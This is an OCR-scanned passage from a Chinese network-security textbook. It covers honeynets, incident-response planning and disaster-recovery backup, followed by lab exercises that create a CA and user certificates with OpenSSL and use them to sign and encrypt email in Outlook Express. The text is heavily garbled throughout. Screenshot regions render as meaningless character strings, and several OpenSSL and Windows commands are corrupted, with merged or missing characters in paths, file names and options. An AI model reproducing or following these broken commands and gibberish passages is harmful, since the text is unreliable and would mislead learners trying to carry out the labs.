应 等 功能 。 较 具 代 表 性 的 产品 型 蜜 网 包括 DTK、honeyd 等 开源 工具 和 KFSensor、ManTraq 
等 一 系列 的 商业 产品 。 研 究 型 蜜 网 则 是 专门 用 于 对 黑客 攻击 的 捕获 和 分 析 ， 通 过 部 署 研究 
型 蜜 网 ， 对 黑客 攻击 进行 追踪 和 分 析 ， 能 够 捕获 黑客 的 击 键 记录 ， 了 解 黑客 所 使 用 的 攻击 
工具 及 攻击 方法 。 


3. 虚拟 密 网 


虚拟 蜜 网 是 通过 应 用 虚拟 操作 系统 软件 (如 VMWare 和 UserModeLinux 等 ) 使 得 我 们 可 
以 在 单一 的 主机 上 实现 整个 蜜 网 的 体系 架构 。 虚 拟 蜜 网 的 引入 使 得 架设 蜜 网 的 代价 大 幅度 
降低 ， 也 容易 部 署 和 管理 ， 但 同时 也 带 来 更 大 的 风险 ， 黑 客 有 可 能 识别 出 虚拟 操作 系统 软 
件 的 指纹 ， 也 可 能 攻破 虚拟 操作 系统 软件 从 而 获得 整个 蜜 网 的 控制 权 。 


4. 核心 需求 


蜜 网 有 三 大 核心 需求 : 数据 控制 ， 数 据 捕获 和 数据 分 析 。 通 过 数据 控制 能 够 确保 黑客 
不 能 利用 蜜 网 危害 第 三 方 网 络 的 安全 ， 以 减轻 蜜 网 架设 的 风险 ; 数据 捕获 技术 能 够 检测 并 
审计 黑客 攻击 的 所 有 行为 数据 ;而 使 用 数据 分 析 技 术 安全 研究 人 员 可 以 从 捕获 的 数据 中 分 
析出 黑客 的 攻击 行动 、 使 用 工具 及 其 意图 。 

5. 应 用 


1) “ 抗 蠕虫 病毒 

蠕虫 的 一 般 传播 过 程 为 扫描 、 感 染 、 复 制 三 个 步骤 。 经 过 大 量 扫描 ， 当 探测 到 存在 漏 
洞 的 主机 时 ， 蠕 虫 主体 就 会 迁移 到 目标 主机 。 然 后 在 被 感染 的 主机 上 生成 多 个 副本 ， 实 现 
对 计算 机 的 监控 和 破坏 。 利 用 蜜 网 技术 ， 可 以 在 蠕虫 感染 的 阶段 检测 其 非法 入 侵 行 为 。 对 
于 已 知 蠕虫 病毒 ， 可 以 通过 设置 防火 墙 和 IDS 规则 ， 直 接 重 定向 到 蜜 网 的 蜜 饮 中 ， 拖 延 颗 
虫 的 攻击 时 间 ; 对 于 全 新 的 蠕虫 病毒 ， 可 以 采取 办 法 延缓 其 扫描 速度 ， 在 网 络 层 用 特定 的 、 
伪造 数据 包 来 延迟 应 答 ， 同 时 利用 软件 工具 对 日 志 进行 分 析 ， 以 便 确 定 相应 的 对 抗 措施 。 

2) ”捕获 网 络 钓鱼 

网 络 钓鱼 是 通过 大 量 发 送 声称 来 自 银行 或 其 他 知名 机 构 的 欺骗 性 垃圾 邮件 ， 意 图 引诱 
收 信人 给 出 敏感 信息 的 一 种 攻击 方式 。 目 前 反 网 络 钓鱼 工作 组 等 机 构 寄 希 望 于 发 觉 网络 钓 
鱼 攻击 的 用 户 向 他 们 报告 ， 通 过 报告 再 进行 分 析 。 这 种 途径 只 能 在 网 络 钓鱼 攻击 发 生 后 从 
受害 者 的 角度 去 观察 ， 并 不 能 清晰 地 了 解 网 络 钓鱼 攻击 的 全 过 程 ， 而 蜜 网 技术 则 提供 了 捕 
获 攻击 者 发 起 攻击 行为 的 整个 过 程 的 能 力 。 在 蜜 网 中 的 蜜 缸 都 是 初始 安装 的 没有 打 漏 洞 补 
丁 的 系统 ， 一 旦 部 署 的 蜜 网 被 网 络 钓鱼 者 利用 以 进行 网 络 钓鱼 攻击 ， 安 全 分 析 人 员 就 能 及 
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时 在 蜜 网 捕获 的 丰富 日 志 数据 的 基础 上 ， 对 网 络 钓鱼 攻击 的 整个 生命 周期 建立 起 一 个 完整 
的 理解 ， 并 深入 剖析 各 个 步骤 中 钓鱼 者 所 使 用 的 技术 手段 和 工具 。 

3) “捕获 僵尸 网 络 

僵尸 网 络 是 近年 来 兴起 的 危害 Internet 的 重大 威胁 之 一 , 它 的 危害 体现 在 发 动 分 布 式 拒 
绝 服务 攻击 、 发 送 垃圾 邮件 以 及 窃取 僵尸 主机 内 的 敏感 信息 等 。 因 此 ， 我 们 可 以 考虑 利用 
在 网 络 中 部 署 恶意 软件 收集 器 ， 采 用 蜜 网 技术 对 收集 到 的 恶意 软件 样本 进行 分 析 ， 确 认 是 
否 是 僵尸 程序 ， 并 对 僵尸 程序 所 要 连接 的 僵尸 网 络 控制 信道 的 信息 进行 提取 ， 最 后 通过 客 
户 端 蜜 缸 技术 ， 伪 装 成 被 控制 的 僵尸 工具 ， 进 入 僵尸 网 络 进行 观察 和 跟踪 。 


6. 发 展 趋势 


1) ”提高 蜜 网 的 可 移植 性 

目前 的 操作 系统 各 种 各 样 ， 大 部 分 蜜 网 只 能 够 在 特定 的 操作 系统 下 工作 。 因 此 ， 能 够 
跨 平台 工作 的 蜜 网 成 为 安全 工作 者 关注 的 焦点 。 如 果 蜜 网 可 以 在 任何 操作 系统 下 生效 ， 蜜 
网 的 适用 范围 变 得 更 宽 ， 使 用 者 的 数量 就 会 不 断 增加 。 

2) ”提高 蜜 网 的 交互 性 

在 尽量 降低 风险 的 情况 下 ， 提 高 蜜 网 与 入 侵 者 之 间 的 交互 程度 。 蜜 网 如 果 仅 仅 支 持 简 
单 的 交互 行为 ， 就 可 能 被 入 侵 者 发 现 并 迅速 全 身 而 退 。 所 以 蜜 网 技术 不 断 进步 的 过 程 中 ， 
必须 尽量 提高 与 入 侵 者 之 间 的 交互 程度 ， 以 便 更 好 地 了 解 入 侵 者 行为 并 得 出 结论 。 

3) ”提高 蜜 网 的 信息 控制 和 记录 功能 

当前 的 蜜 网 技术 在 记录 攻击 者 攻陷 一 台 计 算 机 之 后 的 情况 方面 还 做 得 很 不 够 。 因 为 大 
规模 分 布 式 的 攻击 成 为 一 种 攻击 “时 尚 ”， 了 解 攻击 者 在 攻陷 一 台 计 算 机 之 后 的 所 作 所 为 ， 
成 为 安全 工作 必 不 可 少 的 一 部 分 ， 也 是 蜜 缸 的 重要 工作 。 

4) ”降低 蜜 网 的 风险 

如 何 降低 蜜 网 引入 的 风险 ， 一 直 都 是 蜜 网 使 用 者 们 关注 的 问题 ， 想 要 获得 更 多 的 有 价 
值 的 信息 和 数据 ， 又 要 保持 系统 足够 的 安全 ， 这 的 确 很 难 。 交 互 的 程度 越 高 ， 模 拟 得 越 像 ， 
自己 陷入 危险 的 概率 就 越 大 。 


11.5.3 ”做 好 响应 计划 

当 发 生 了 安全 破坏 活动 时 ， 需 要 有 一 个 事先 的 计划 来 与 黑客 进行 周旋 ， 同 时 还 要 有 一 
个 良好 的 策略 来 说 明 怎样 、 何 时 报告 安全 事件 ， 以 及 怎样 通知 相关 组 织 和 个 人 。 
11.5.4 ”建立 响应 策略 


制定 符合 所 在 组 织 情况 的 响应 策略 ， 将 所 制定 的 响应 策略 写 入 文档 ， 文 档 将 用 于 说 明 
怎样 执行 步骤 ,并且 可 以 将 文档 展示 出 来 让 所 有 IT 人 员 在 任何 时 间 都 能 看 到 ,用 以 指导 员 
工 在 遇 到 攻击 时 按 文 档 中 所 述 步骤 来 执行 ， 除 非 有 特殊 合理 的 理由 ， 和 否则 必须 严格 执行 响 
应 策略 。 
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11.5.5 实施 响应 计划 


执行 一 个 响应 计划 ， 对 公司 的 安全 策略 和 攻击 事件 性 质 做 出 判断 。 通 常 响应 计划 就 是 
根据 安全 策略 来 决定 做 什么 事情 。 

1. 实施 响应 计划 的 步骤 

(1) 通知 受到 影响 的 相关 人 员 。 

(2) 中 断 连 接 或 建立 一 个 “监狱 ”。 

(3) 通知 警方 。 

(4) 联系 黑客 。 

(5) 追踪 连接 并 运用 其 他 检测 方法 ， 以 进一步 掌握 黑客 的 其 他 活动 。 

(6) 重新 配置 防火 墙 。 


2. 通知 受到 影响 的 人 员 

通知 管理 人 员 是 第 一 步 ， 然 后 由 相关 部 门 来 负责 做 出 决定 ， 这 要 根据 事前 制定 的 安全 
策略 来 执行 。 如 果 黑 客 已 经 威胁 到 了 一 个 合法 的 帐号 ， 就 要 通知 该 用 户 更 改 密码 并 彻底 检 
查 自 己 的 档案 ， 以 确定 该 计算 机 是 否 被 黑客 修改 。 

3. 通知 Internet 代理 商 


计算 机 应 急 响 应 小 组 (CERT) 每 年 都 会 接 到 数 千 个 求助 邮件 或 电话 。CERT 也 会 发 布 调 
查 报 告 、 威 胁 警 报 等 。 如 果 怀 疑 有 黑客 入 侵 系 统 ， 可 以 联系 CERT(www.cert.org)， 他 们 能 
及 时 地 帮助 你 解决 问题 。 


11.5.6 ” 容 灾 备份 计划 及 技术 


在 限定 时 间 内 成 功 的 灾难 恢复 是 企业 安全 策略 中 的 一 个 关键 组 成 部 分 ， 而 要 实现 这 一 
目标 ， 很 重要 的 措施 是 要 建立 容 灾 备份 计划 。 

常用 的 容 灾 备 份 技术 很 多 。 

利用 磁带 复制 进行 数据 备份 和 恢复 是 最 常见 的 灾难 备份 方式 。 使 用 这 种 方式 的 数据 备 
份 通常 是 存储 在 盘 式 或 盒 式 磁带 上 ， 并 存放 在 远离 生产 系统 的 某 个 安全 地 点 。 实 现 过 程 复 
杂 ， 恢 复 效率 低 。 

远程 数据 库 复 制 技术 可 以 对 数据 库 系统 实现 容 灾 ， 这 种 技术 由 数据 库 系统 软件 来 实现 
数据 库 的 远程 复制 和 同步 。 基 于 数据 库 的 复制 方式 可 分 为 实时 复制 、 定 时 复制 和 存储 转发 
复制 , 并 且 在 复制 过 程 中 , 还 有 自动 冲突 检测 和 解决 的 手段 ， 以 保证 数据 一 致 性 不 受 破坏 。 

目前 应 用 较 多 的 容 灾 是 基于 智能 存储 系统 的 远程 数据 复制 技术 ， 它 由 智能 存储 系统 自 
身 实现 数据 的 远程 复制 和 同步 ， 智 能 存储 系统 将 对 本 系统 中 的 存储 器 IO 操作 请 求 复 制 到 
远 端 的 存储 系统 中 并 执行 ， 保 证 数据 的 一 致 性 。 由 于 这 种 方式 下 数据 复制 软件 运行 在 存储 
系统 内 ， 因 此 较 容 易 实现 主 中 心 和 灾难 备份 中 心 的 操作 系统 、 数 据 库 、 系 统 库 和 目录 的 实 
时 备份 维护 能 力 ， 且 不 会 影响 主 中 心 主机 系统 的 性 能 。 

基于 逻辑 磁盘 卷 的 远程 数据 复制 是 指 根 据 需 要 将 一 个 或 多 个 卷 进行 远程 同步 (或 者 异 
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步 ) 复 制 。 该 方案 通常 通过 软件 来 实现 , 基本 配置 包括 卷 管理 软件 和 远程 复制 控制 管理 软件 。 
远程 复制 控制 管理 软件 将 主 用 节点 系统 卷 的 每 次 IO 的 操作 数据 实时 (或 准 实 时 或 延 时 ) 复 
制 到 远程 节点 的 相应 卷 上 ， 从 而 远程 实现 两 个 卷 之 间 的 数据 同步 (或 准 同步 )， 主 、 备 节点 
之 间 遂 常 需要 配置 相应 带宽 的 卫 通道。 基于 风 辑 磁盘 卷 的 远程 数据 复制 会 增加 各 节点 主机 
的 一 些 处 理性 能 需求 ， 并 且 在 此 前 提 下 能 保持 所 需要 的 通信 和 带宽、 远程 复制 效率 和 数据 一 
致 性 。 基 于 逻辑 磁盘 卷 的 远程 数据 复制 因为 是 基于 逻辑 存储 管理 技术 ， 一 般 与 主机 系统 、 
物理 存储 系统 设备 无 关 ， 对 物理 存储 系统 自身 的 管理 功能 要 求 不 高 ， 有 较 好 的 可 管理 性 ， 
也 便于 主 、 备 系统 的 扩充 和 发 展 ， 同 时 ， 也 可 方便 做 到 节点 的 多 对 一 或 一 对 多 的 远程 数据 
复制 。 


第 12 章 实际 技能 训练 


实 训 是 高 等 职业 教育 中 非常 重要 的 一 个 教学 环节 。 开 设 本 章 的 目的 主要 是 为 配合 前 面 
讲述 的 网 络 安全 管理 与 维护 的 相关 理论 知识 ， 以 此 为 基础 进行 一 系列 的 实际 安全 训练 和 
配置 。 

本 章 共 设计 了 15 个 实 训 案 例 , 每 一 个 实 训 案例 都 与 前 述 的 理论 知识 相对 应 , 包括 实 训 
目的 、 实 训 环境 、 实 训 内 容 和 步骤 三 部 分 内 容 。 

本 章 实 训 的 主要 目的 如 下 

(1) 在 实践 过 程 中 ， 使 学 生 进一步 巩固 网 络 安全 管理 与 维护 课程 所 学 知识 ， 更 加 深入 
地 了 解 网 络 安全 威胁 、 黑 客 技术 以 及 网 络 安全 技术 的 实施 、 网 络 安全 维护 等 内 容 。 

(2) 按照 网 络 信息 安全 的 相关 要 求 引导 学 生 完 成 实 训 课题 ， 以 便 学 生 了 解 网 络 安全 管 
理 与 维护 的 儿 个 重要 环节 。 

(3) 指导 学 生 利用 获取 信息 的 手段 进一步 获取 新 知识 ， 以 解决 实 训 过 程 中 过 到 的 技术 
难点 ， 从 而 提高 学 生 的 自学 能 力 。 

(4) 提高 学 生 的 实际 动手 能 力 ， 培 养 学 生 分 工 协作 的 团队 精神 。 


12.1 数字 证 书 与 数字 签名 实 训 
12.1.1 使 用 OpenSSL 生成 证 书 


一 、 实 训 目 的 

(1) 了 解数 字 证 书 的 结构 、 公 钥 密 码 体制 的 原理 。 

(2) 了 解数 字 证 书 的 申请 、 生 成 、 签 署 、 颁 发 的 过 程 。 

(3) 掌握 数字 证 书 正 、OFE 的 衔接 过 程 。 

二 、 实 训 环境 

(1) 个 人 计算 机 一 台 ， 基 本 配置 : Pentium 及 以 上 的 CPU， 内 存 容量 在 128MB 以 上 ， 
硬盘 空间 在 10GB 以 上 。 

(2) 个 人 计算 机 中 预 装 Windows 2000 或 Windows XP 操作 系统 和 浏览 器 。 

(3) OpenSSL 软件 包 。 

三 、 实 训 内 容 和 步骤 

1. 准备 工作 

步骤 一 ”下载 OpenSSL 安装 包 。 

步骤 二 ”解压 缩 软件 包 ， 解 压缩 在 C 盘 根 目录 下 ， 自 动 生成 OpenSSL 文件 夹 。 
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步骤 三 ”选择 “开始 ”|“ 程 序 ”|“ 附 件 ”|“ 命 令 提 示 符 ”命令 ,打开 “ 命 令 提 示 符 ” 
窗口 ， 如 图 12-1 所 示 。 


881 Micro 


>: Docunents and Settings\owner), 


图 12-1 “命令 提示 符 ” 窗 口 


步骤 四 输入 cd c:\opensslvout32dll 后 按 Enter 键 ， 进 入 到 opensslvout32dll 的 目录 下 ， 
如 图 12-2 所 示 。 


12-2 切换 目录 


步骤 五 ”创建 一 个 用 于 存放 证 书 的 文件 夹 。 命 令 为 md mycrt， 输 完 按 Enter 键 ， 出 现 
如 图 12-3 所 示 的 页 面 。 


12-3 ”创建 文件 夹 


步骤 六 进入 mycrt 文件 来， 命令 为 cd mycrt， 如 图 12-4 所 示 。 
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12-4 ”进入 新 文件 夹 
步骤 七 ”把 以 下 4 个 文件 复制 到 当前 文件 夹 : 


Openssl.cnf, index.txt, index.txt.attr, serial。 
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复制 命令 为 copy ci\openssl\openssl.cnf c:\opensslvout32dllmycrt， 按 Enter 键 后 ， 
openssl.cnf 文件 复制 完成 ， 如 图 12-5 所 示 。 


Docunent ting d c:\openssl\out32d11 


图 12-5 复制 文件 (1) 
按 同样 步骤 , 把 其 他 3 个 文件 复制 到 当前 文件 夹 , 命令 如 下 (下 面 用 <Enter> 表 示 按 Enter 


可 


键 )。 
复制 文件 mdex.txt 的 命令 为 : 
copy c:\openssl\apps\demoCA\index.txt c:\openssl\out32dll\mycrt <Enter> 
复制 文件 index.txt.attr 的 命令 为 


copy c:\openssl\apps\demoCA\index.txt.attr 
c:\openssl\out32dll\mycrt <Enter> 


复制 文件 serial 的 命令 为 


copy c:\openssl\apps\demoCA\serial c:\openssl\out32dll\mycrt <Enter> 


输入 命令 及 执行 结果 如 图 12-6 所 示 。 


>: \Docunents and Settings new’cd c:\openssl\out32d1l 
>: openssl\out32dll)nd mycrt 
slvout32dllcd nycrt 


out32dllvmycrt>copy c: ao .cnf c:\openssl\out32dll nycr' 
1 


sl\out32dll\nycrt)copy c:\openssl\app ny ex-txt c:\openssl\out32| 


1\vut32dll\nycrtycopy c:\openssl\apps \denoCA 
dll\nycrt 
1 


sl\out32dll\nycrt)copy c:\open 


1 


图 12-6 复制 文件 (2) 
步骤 八 ” 查 看 是 否 把 4 个 文件 复制 到 mycert 文件 夹 , 命令 为 dir， 如 图 12-7 所 示 ， 至 此 
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文件 已 经 复制 完成 。 


7 C:\WINDOYS\systen32\cad. exe 


sl\out32dll\nycrt)copy c:\openssl\apps \denoCA\index.txt.attr c:\openss 


1\out32dll\nycrt)copy c:\openssl\apps enoCA\serial csvopensslvout32dl1 


l\out32dll\nycrt 


13:86 DIR> 
13:86 DIR> 
8 
:33 
3 


919.464 


enssl\out32dll nycrt 


图 12-7 查看 文件 
2. 实 训 内 容 和 步 又 
步骤 一 “为 CA 创建 一 个 RSA 私 钥 。 命 令 如 下 : 


set path=c:\openssl\out32d]1]l1;%path%®; 
openssl genrsa -des3 -out ca.key 1024 


如 图 12-8 所 示 ， 生 成 一 个 存放 私 钥 密 码 的 ca.key 文件 ( 注 : 需 输 入 原先 设 定 的 保 


verify ~in prig26h231f .enc ~inkey nyrsaCA .ke 


l\out32dll\nycrt 


溢 式 侣 村 负 到 招 邓 


dll\nycrt>set path-c:\openssl\o 


图 12-8 生成 存放 私 钥 的 文件 
步骤 二 用 CA 的 RSA 私 钥 创 建 一 个 自 签名 的 CA 根 证 书 。 
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创建 一 个 自 签名 的 根 证 书 ， 运 行 req 命令 ， 生 成 一 个 cacert.crt 文件 。 命 令 如 下 : 
openssl req -new -x509 -days 3650 -key cakey -outcacert.crt -config openssl.cnf， 输 
入 命令 后 ,提示 输入 国家 代号 、 省 份 名 称 、 城 市 名 称 、 公 司 名 称 、 部 门 名 称 、 姓 名 及 E-mail 
地 址 ， 生 成 的 根 证 书 的 名 字 为 cacert.crt， 如 图 12-9 所 示 。 


图 12-9 生成 cacert.crt 文件 

步骤 三 ”为 用 户 ( 服 务 器 、 个 人 ) 颁 发 证 书 ， 

为 用 户 颁 发 证 书 ， 先 用 genrsa 命令 为 用 户 生 成 私 钥 ， 再 用 req 命令 生成 证 书签 署 请 求 
CSR， 然 后 再 用 x509 命令 生成 证 书 。 

输入 命令 ; openssl genrsa -des3 -out 026h23fkey 1024， 出 现 如 图 12-10 所 示 的 页 
面 ( 注 : 设 定 用 户 私 钥 的 保护 密码 )。 

输入 命令 : openssl req -new -key 026h23fkey -out 026h23f.csr -config openssl.cnf， 出 现 
如 图 12-11 所 示 的 页 面 。 

输入 命令 : openssl x509 -req -in 026h23f.csr -out 026h23f.crt -CA cacert.crt -CAkey ca.key 
-days 600 ， 出 现 如 图 12-12 所 示 的 页 面 ， 要 求 输入 CA 的 RSA 私 钥 的 保护 密码 。 


执行 上 面 的 命令 时 要 按 提 示 输 入 个 人 信息 ， 最 后 生成 客户 证 书 026h23f.crt。 


genrsa -des3 一 out 3f-ke7 1024 


图 12-10 生成 客户 证 书 步骤 一 


Bx19861> 
phrase for 日 
Enter pass phra 


ssl\out32dll nycrtYopens req 一 key 826h 


config op 
information that vill be incorporated 
guished Nane or a DN. 


quite a elds but ， e sone blank 
ome Field 


1 Unit Name 《 » sec ) a es Division 
onnon Nan ,MD F 
Enail nddr HUANGJINBOYe163 -CO 


:opensslsout32dllsmycrt》 


图 12-11 生成 客户 证 书 步骤 二 


what is called a Distinguished Nane 
you can leav ne blank 
s there will be a default value, 
» the Field will be left b 


uision]:USST 


lout32dllsm 
done 
T/0U-USSTvenailnddress-HURNGJIRBOYe163.COH 


akey: 
file or directory 


ss 1\out32dll\nycrt> 


图 12-12 生成 客户 证 书 步骤 三 


步骤 四 ”将 生成 的 证 书 再 进一步 转换 为 个 人 私 钥 证 书 
可 进一步 使 用 pkcs12 命令 ， 如 下 : 


溢 祷 侣 村 者 纠 招 邓 


们 


openssl pkcsl2 - 


ort -clcerts -in 026h23f.crt -inkey 026h23f.key 
机 -out 026h23f. p12 


这 样 将 会 得 到 一 个 含有 私 钥 的 证 书 026h23f.p12。 
步骤 五 ”证 书 的 使 用 。 
在 正 ee 器 hh, 可 以 利用 荣 FF 的 和 
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具 ” 菜 单 下 的 “选项 ”命令 ,在 “选项 ”对 话 框 中 切换 到 “安全 ”选项 卡 来 导入 数字 证 书 ， 
壁 如 前 面 的 026h23fp12 证 书 ， 如 图 12-13 所 示 ， 这 样 就 可 以 对 发 送 的 邮件 进行 签名 和 解 
密 了 。 


a 2 | 且 
_ 拼 S 检 查 | 六 | 过 | 给 沪 | 


病毒 防护 
选择 要 使 用 的 Internet Explerer 安全 区 域 
E 4 〇 Internet 区 域 不 大 安全 ,但 更 实用 ) &) 
全 雪耻 站 点 区 域 翅 安全 ) @@) 
回 当 别 的 应 用 程序 试图 用 我 的 名 义 发 送 电子 邮件 时 警告 我 WD)。 
口 不 允许 保存 或 打开 可 能 有 病毒 的 附件 QD)。 


下 载 图 像 
回 阻止 MTWL 电子 邮件 中 的 图 像 和 其 地 外 部 内 容 组 ) 


安全 邮件 
Te 

多 i 
Bi Er 


口 对 所 有 待 发 邮件 的 内 容 和 附件 进行 加 密 到 ) 
口 在 所 有 符 发 邮件 中 添加 数字 签名 中 ) 


Cv ) 
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12.1.2 用 CA 证 书签 名 、 加 密 ， 发 送 安 全 电子 邮件 


一 、 实 训 目 的 

由 于 越 来 越 多 的 人 通过 电子 邮件 进行 重要 的 商务 活动 和 发 送 机 密 信息 ， 而 且 随 着 互联 
网 的 飞速 发 展 ， 这 类 应 用 会 更 加 频繁 。 因 此 保证 邮件 的 真实 性 ( 即 不 被 他 人 伪造 ) 和 不 被 其 
他 人 截取 和 偷 阅 也 变 得 日 趋 重 要 。 因 为 我 们 知道 : 用 许多 黑客 软件 能 够 很 容易 地 发 送 假 地 
址 邮件 和 匿名 邮件 ， 另 外 即使 是 正确 地 址 发 来 的 邮件 在 传递 途中 也 很 容易 被 别人 截取 并 阅 
读 。 这 些 对 于 重要 信件 来 说 是 难以 容忍 的 。 这 里 以 Outlook Express 为 例 来 介绍 发 送 安全 邮 
件 和 加 密 邮件 的 具体 方法 。 


二 、 实 训 环 境 


(1) 个 人 计算 机 一 台 ， 基 本 配置 : Pentium 及 以 上 的 CPU， 内 存 容量 在 128MB 以 上 ， 硬 
盘 空间 在 10GB 以 上 。 

(2) 个 人 计算 机 中 预 装 Windows 2000 或 Windows XP 操作 系统 。 

(3) 操作 系统 预 装 浏览 器 和 Outlook Express 软件 。 


三 、 实 训 内 容 和 步骤 
1. 安全 电子 邮件 证 书 的 申请 


使 用 数字 证 书 来 签名 、 加 密 ， 必 须 先 申请 一 张 数字 证 书 。 现 在 发 数字 证 书 的 机 构 很 多 ， 
但 主要 是 在 国外 ， 当 然 现在 国内 各 省 也 在 建立 自己 的 CA 中 心 ， 并 且 有 些 机 构 提供 免费 的 
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数字 证 书 ， 如 MyCA(https://www.myca.cn)。 

申请 使 用 安全 电子 邮件 证 书 首先 需要 确认 你 使 用 的 是 POP3 收 件 方式 (步骤 略 ), 因为 现 
在 的 数字 证 书 不 支持 Web 收 件 方式 。 

步骤 一 “登录 网 站 http://www.myca.cn/myca/， 页 面 如 图 12-14 所 示 。 
ET 
@e .昌国 加 的 站 er 灾 tmx @ 会 -如 加 Leosome 
Ts 0 


YaHoo!- A -中 加 上 ma 了 站 7” 四” 


注册 
(@) 这 本 此 和 项 可 以 四 疡 注册 一 个 半 评 书 。 | 


乓 获取 下 汪 可 以 同 于 客户 江 匠 证、 安全 提 了 各 站 ,并 且 没 
交 但 是 主流 有 获取 ， 请 迁 标 该 选项 。 有 合用 风 同 和] 限 补 。 扣 你 要 下 放 用 于 友 籽 及 运 EP9PA 
还 节 ， 请 缮 和 yt hnfaaoyre en 


[3 本 此 和 而 可 以 查 冰 一 人 类 二 训 蔬 ， 这 珊 功 能 有 且 确定 一 个 效 字 有 关中 证、 全 有 二 下 的 问题 洁 则 江 
A Te 
基于 CA 
违反 芝 个 适 项 可 以 吊销 念 的 数字 证 下 。 加 果 性 区 迪 正 书 受 到 Le 
人 Se 各 全 开赴 验 cA 所 持 有 者 的 磋 身 
境 ， 重 公 日 和 给 证 


详 " EE 
图 12-14 ”登录 网 站 
步骤 二 ”安装 CA 根 证 书 。 单 击 图 12-14 右 侧 的 “安装 根 证 书 ” 链 接 ， 出 现 如 图 12-15 
所 示 的 提示 页 面 ， 单 击 “ 是 ”按钮 ， 开 始 安装 根 证 书 。 根 证 书 是 你 所 信任 机 构 的 证 书 ， 在 
这 里 就 是 MyCA 的 证 书 。 


EE -& 著 字 证 蔬 由 心 


a 
Oi- © BO Pm em © E- 号 回 - 日 外 四 日 耻 避 


地 址 由” tp /we nyes evegewlirstalgon a” 轩 Dsa 本 亡 答 > 
了 Hocl- AME- mw 回 上 Rm- PT 国界 » 


沼 洲 车 粕 壮 ” 寺 潍 式 谷 寺 册 台 招 卫 


E] EEF FR httpe /wwe nyes cr/ eree/ trtal Rent ss? [CR EY EET 


12-15 ”提示 页 面 


TT 劳 12 章 艾 记 龙 衣 六 经 


步骤 三 ”在 图 12-16 所 示 的 注册 页 面 中 按 规 定 要 求 填写 注册 信息 。 


@m .日 国 司 多 | Pen 次 vax @ 全 -总 加 加 了 


地 让 @ | 国 Netps //ver_ nes mye serinr ons ep 所 3 is” 
THool- | Yam Nim 加 于 站 站 时 车 2 ”| 风 ” 


注册 ick 


基本 信息 
这 于 填写 的 昕 有 信息 桥 包 括 在 怎 曙 区 字 证 节 中 ， 并 疝 公 众 公开 。 有 “*” 碌 i 
眉 为 妙计 字 耻 。 


12-16 注册 页 面 


步骤 四 上 一 步 完成 后 提交 。 确 认 填 写 的 电子 邮件 信息 是 否 正确 ， 确 认 后 单 击 “ 确 定 ” 


按钮 。 弹 出 “潜在 的 脚本 冲突 ”对 话 框 ， 单 击 “ 是 ”按钮 完成 数字 证 书 的 申请 。 
步骤 五 收 到 管理 员 发 来 的 电子 邮件 ， 按 邮件 提示 步骤 取 回 数字 证 书 ， 即 输入 个 人 身 


份 号 ( 管 后 在 图 12-17 所 示 的 页 面 ， 完 成 安装 。 


Er a 查看 QI) 收 底 邮 ) 工具 


四 与 日 | 会 -部 回 : 台 久居 画 介 队 放 


地 址 @， ”| 大 http .yw wyea anyevaspislap ssp = 回回 # 到 te ” 
Taool- YA mR. NM 加 上 RU 了 本 回复 EE bh a 
获取 证 书 


重要 提示 : 这 一 步 必须 用 与 注册 时 相同 的 计算 机 末 完 成 > 
蓝 完 友信 一 步 ， 身 从 识别 旬 (PIN) 是 必需 的 。 在 提交 注册 胡 与 ， 管 理 贞 会 葡 证 尔 的 届 价 ， 并 决定 是 百 给 你 筑 发 数字 证 书 。 如 
黑 贞 份 验 证 通过 ， 示 统 梅 为 你 产生 妆 字 证 书 ， 并 给 你 发 送 一 封 科 为 “你 的 数字 证 书 己 烃 到 准备 好 了 "的 包子 部 件 ， 该 邮件 包括 一 
个 活 取 你 数字 这 书 的 性 合 和 一 个 身 付 识别 码 (PIN) 。 


从 电子 是 件 中 复制 FTW， 粘 贴 到 下 面 的 文本 框 中 ， 热 后 点 击 "提交 ” 近 钮 < 


提交 后 ， 在 得 到 响 让 之 前 ， 下 要 中 断 你 的 六 | 卜 絮 。 
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2. 在 Outlook Express 中 使 用 数字 证 书 

步骤 一 在 Outlook Express 里 选择 “工具 ”| “帐户 ”命令 ， 打 开 “Intemet 帐户 ”对 话 框 。 

步骤 二 切换 到 “邮件 ”选项 卡 ， 选 择 你 申请 证 书 的 邮件 帐号 ， 单 击 “ 属 性 ”按钮 ， 
在 弹出 的 如 图 12-18 所 示 的 对 话 框 中 切换 到 “安全 ”选项 卡 。 


图 12-18 “安全 ”选项 卡 


步骤 三 在 “安全 ”选项 卡 中 选择 相应 的 签名 和 加 密 证 书 。 
步骤 四 写 好 邮件 后 在 上 方 的 工具 栏 中 单 击 “ 签 名 ”、“ 加 密 ” 按 钮 以 实现 相应 的 功 
能 ， 如 图 12-19 所 示 。 


图 12-19 “新 邮件 ”窗口 


山 U 0 


注意 : 电子 邮件 的 加 密 前 提 是 必须 要 收 件 人 和 发 件 人 都 有 数字 证 书 ， 如 果 发 件 人 想 要 给 指 
定 的 收 件 人 发 送 加 密 邮 件 的 时 候 ， 那 么 必须 有 这 个 指定 的 收 件 人 发 送 的 签名 邮件 ， 
如 果 使 用 Outlook Express 或 者 Outlook 接收 邮件 ， 那 么 在 收 件 箱 中 收取 邮件 时 ， 选 
定 该 邮件 后 右 击 ， 在 弹出 的 快捷 菜单 中 选择 “将 发 件 人 添加 到 通讯 簿 ”命令 ， 则 系 
统 会 自动 将 收 到 邮件 的 签名 证 书 导 入 系统 ， 这 样 在 下 一 次 想 要 给 对 方 发 送 加 密 邮 件 
的 时 候 ， 只 需要 选中 “加 密 ” 单 选 按 钮 即 可 完成 加 密 过 程 。 


3. 证 书 的 导出 


有 时 候 需 要 将 证 书 安装 到 其 他 的 计算 机 系统 中 ， 那 么 我 们 首先 要 导出 证 书 。 

步骤 一 打开 正 窗口 ,选择 “ 工 具 ”|“Intemet 选项 ”命令 ， 在 弹出 的 对 话 框 中 单 击 
“内 容 ” 标 签 ， 切 换 到 “内 容 ” 选 项 卡 中 并 单 击 “证 书 ” 按 钮 。 

步骤 二 ”选择 需要 备份 的 证 书 ， 单 击 “ 导 出 ”按钮 。 

步骤 三 ”进入 证 书 导 出 界面 ， 如 图 12-20 所 示 ， 单 击 “ 下 一 步 ” 按 钮 。 

步骤 四 “选择 导出 私 钥 和 导出 文件 的 格式 。 这 里 要 注意 的 是 一 定 要 选中 “如 果 可 能 ， 
将 所 有 证 书包 括 到 证 书 路 径 中 ” 复 选 框 。 

证 书 导 出 向 导 


导出 文件 格式 
可 以 用 不 同 的 文件 格式 导出 证 书 。 


选择 要 使 用 的 格式 


口 如果 可 能 ， 格 所 有 证 书包 括 到 让 书 路 径 中 WD 
